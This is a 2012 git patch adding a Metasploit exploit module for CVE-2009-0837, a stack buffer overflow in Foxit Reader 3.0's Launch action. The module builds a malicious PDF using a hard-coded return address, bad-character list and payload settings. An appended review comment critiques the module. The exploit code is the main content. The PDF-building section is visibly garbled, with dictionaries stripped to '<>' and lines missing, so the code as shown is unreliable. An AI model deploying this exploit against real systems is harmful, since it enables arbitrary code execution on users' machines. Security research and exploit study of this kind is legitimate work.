From 41aac751e9322c402eb1637f5b1b875311db103e Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Fri, 18 May 2012 13:25:51 -0500
Subject: [PATCH] Add CVE-2009-0837 by bannedit - Foxit Reader 3 Launch Action Buffer Overflow

This was added last year, but yanked due to some reliability issues. bannedit gave me the updated version recently, and the issue he was having appears to be resolved. There is no good P/P/R to use in XP SP3, so that system isn't supported.
---
 .../windows/fileformat/foxit_reader_launch.rb | 109 ++++++++++++++++++
 1 file changed, 109 insertions(+)
 create mode 100644 modules/exploits/windows/fileformat/foxit_reader_launch.rb

diff --git a/modules/exploits/windows/fileformat/foxit_reader_launch.rb b/modules/exploits/windows/fileformat/foxit_reader_launch.rb
new file mode 100644
index 0000000000..af74e5ca34
--- /dev/null
+++ b/modules/exploits/windows/fileformat/foxit_reader_launch.rb
@@ -0,0 +1,109 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'zlib'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = GoodRanking
+
+ include Msf::Exploit::FILEFORMAT
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a buffer overflow in Foxit Reader 3.0 builds 1301 and earlier.
+ Due to the way Foxit Reader handles the input from an "Launch" action, it is possible
+ to cause a stack-based buffer overflow, allowing an attacker to gain arbitrary code
+ execution under the context of the user.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'bannedit', # Metasploit module
+ ],
+ 'Version' => '$Revision: 14069 $',
+ 'References' =>
+ [
+ [ 'CVE' , '2009-0837' ],
+ [ 'OSVDB', '55614' ],
+ [ 'BID', '34035'],
+ [ 'URL', 'http://www.coresecurity.com/content/foxit-reader-vulnerabilities']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ 'DisablePayloadHandler' => 'true',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 1024,
+ 'BadChars' => "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0d\x22\x28\x29\x2F\x5c\x3c\x3e\x5e\x7e"
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Foxit Reader 3.0 Windows XP SP2', { 'Ret' => 0x74d34d3f} ], # ebp + offset
+ ],
+ 'DisclosureDate' => 'Mar 09 2009',
+ 'DefaultTarget' => 0))
+
+ register_options([
+ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
+ ], self.class)
+
+ end
+
+ def exploit
+ pdf = make_pdf
+ file_create(pdf)
+ handler
+ end
+
+ def make_pdf
+ action = "\n<>/NewWindow true>>"
+
+ pdf = "%PDF-1.4\n"
+ pdf << "1 0 obj\n"
+ pdf << "<>/Contents 2 0 R "
+ pdf << "/Annots[ 24 0 R 25 0 R 9 0 R ]>>\n"
+ pdf << "endobj\n"
+ pdf 
<< "4 0 obj\n"
+ pdf << "<>\n"
+ pdf << "endobj\n"
+ pdf << "7 0 obj\n"
+ pdf << "<>\n"
+ pdf << "endobj\n"
+ pdf << "9 0 obj\n"
+ pdf << "<>/BE<>/MK<>>>/AP<>/T()/A 12 0 R /AA 17 0 R >>\n"
+ pdf << "endobj\n"
+ pdf << "16 0 obj\n"
+ pdf << action
+ pdf << "endobj\n"
+ pdf << "17 0 obj\n"
+ pdf << "<>\n"
+ pdf << "endobj\n"
+ pdf << "trailer\n"
+ pdf << "<<00000000000000000000000000000000>]"
+ pdf << "/DocChecksum/00000000000000000000000000000000/Size 31>>\n"
+ pdf << "startxref\n"
+ pdf << "0000\n"
+ pdf << "%%EOF\n"
+ pdf
+ end
+end
\ No newline at end of file
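Review bot: The single target's `'Ret' => 0x74d34d3f`, annotated only `# ebp + offset`, appears to be a fixed stack address rather than a pop/pop/ret gadget, so the exploit depends on the Foxit stack layout (build, environment, document path length) staying exactly as it was when the value was measured, and nothing in the module says so; the commit message's reason for omitting XP SP3 is not carried into the code either. I would replace the inline comment with `# fixed stack address (ebp + offset) measured on Foxit 3.0 builds 1301 and earlier / XP SP2; no usable P/P/R for XP SP3, so it is unsupported` and reconsider whether GoodRanking or NormalRanking better reflects a hard-coded stack guess. Two smaller items: `require 'zlib'` is never referenced in the visible code, and the description's "an "Launch" action" should read "a "Launch" action". The PDF dictionary bodies (`<<...>>`) and roughly ten lines of the 109-line hunk are missing from this rendering, so the Launch action's `/F(...)` string and the trailer could not be reviewed here.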